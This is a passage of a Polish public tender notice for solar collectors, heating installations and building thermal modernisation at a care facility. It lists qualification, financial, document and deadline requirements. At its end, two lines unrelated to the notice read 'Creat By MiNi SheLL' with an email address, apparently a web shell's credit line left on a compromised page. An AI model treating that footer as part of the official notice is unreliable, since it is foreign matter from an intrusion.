       Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji     w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
6.1.3.1	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi i zdolnością kredytową) - w wysokości co najmniej 300 000  PLN;
6.1.3.2	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum   800 000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>1_co najmniej dwie(2) dotyczą zaprojektowania i wykonania                
                                              robót budowlanych, w zakresie których było między innymi wykonanie
             systemów solarnych kolektorów słonecznych na bazie płaskich 

2_co najmniej dwie(2) dotyczą zaprojektowania i wykonania                
                                            robót budowlanych, w zakresie których było wykonanie lub wymiana wew.  instalacji c.o., c.w.uż. w obiekcie co najmniej dwukondygnacyjnym
3_co najmniej dwie(2) dotyczą zaprojektowania i wykonania robót budowlanych, w zakresie których była termomodernizacja budynku               
                           z zakresem ocieplenia przegród zewnętrznych, wymianie stolarki  budowlanej, wykonaniu elewacji



             kolektorów słonecznych wspartych na konstrukcji stalowej 
             z wykonaniem instalacji automatyki i sterowania  pracą instalacji solarnej;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - wg wzoru stanowiącego Załącznik nr 7.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.jgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej lub w wersji papierowej- w ciągu 5dni od daty złożenia wniosku z dołączonym dowodem wpłaty 70zł na konto Zamawiającego (jak dla wadium),z adnotacją: SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 10:00, miejsce: bezpośrednio _Sekretariat Wojewódzkiego Centrum Szpitalnego Kotliny Jeleniogórskiej, ul. Ogińskiego 6, 58-506 Jelenia Góra, pokój 171 lub za pośrednictwem operatora wyznaczonego na adres jw.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje dokonanie jednorazowej wizji lokalnej z udziałem potencjalnych wykonawców w dniu 14 kwietnia 2014 r. godz. 10:30 w celu wyjaśnienia wątpliwości dotyczących treści niniejszej SIWZ. Miejsce zbiorki: hol wejścia głównego Zakładu Opiekuńczo-Leczniczego w Bolkowie, ul. Wysokogórska 19

Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego  w ramach 
Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013
      Priorytet    nr 5 .     Regionalna Infrastruktura energetyczna przyjazna środowisku (Energetyka)      Działanie  nr 5.4     Zwiększenie efektywności  energetycznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com